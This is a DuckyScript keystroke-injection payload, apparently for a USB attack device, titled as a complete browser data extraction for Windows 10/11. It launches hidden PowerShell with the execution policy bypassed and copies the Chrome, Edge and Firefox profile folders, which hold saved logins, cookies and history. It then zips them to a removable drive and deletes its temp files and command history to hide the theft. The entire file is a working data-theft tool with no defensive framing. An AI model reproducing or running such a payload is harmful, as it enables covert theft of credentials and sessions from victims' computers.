# ============================================
# WINDOWS BROWSER FULL - Complete Extraction
# ============================================
# Purpose: Extract all browser data
# Time: 30 seconds
# Target: Windows 10/11
# Author: D3n14l0f53rv1c3
# ============================================

DELAY 2000

GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass
ENTER
DELAY 3000

STRING $td = "$env:TEMP\.br"; md $td -Force
ENTER
DELAY 200

# Chrome full extract
STRING $ch = "$td\chrome";
ENTER
STRING md $ch -Force
ENTER
STRING Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\*" $ch -Recurse -Force -ErrorAction SilentlyContinue
ENTER
DELAY 2000

# Edge extract
STRING $ed = "$td\edge";
ENTER
STRING md $ed -Force
ENTER
STRING Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\*" $ed -Recurse -Force -ErrorAction SilentlyContinue
ENTER
DELAY 2000

# Firefox extract
STRING $ff = "$td\firefox";
ENTER
STRING md $ff -Force
ENTER
STRING Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\*" $ff -Recurse -Force -ErrorAction SilentlyContinue
ENTER
DELAY 2000

# Compress and copy
STRING Compress-Archive -Path "$td\*" -DestinationPath "$td\browser.zip" -Force
ENTER
DELAY 1000

STRING if (Test-Path E:\) { Copy-Item "$td\browser.zip" "E:\" -Force }
ENTER
DELAY 500

STRING Remove-Item $td -Recurse -Force
ENTER
STRING Clear-History; exit
ENTER
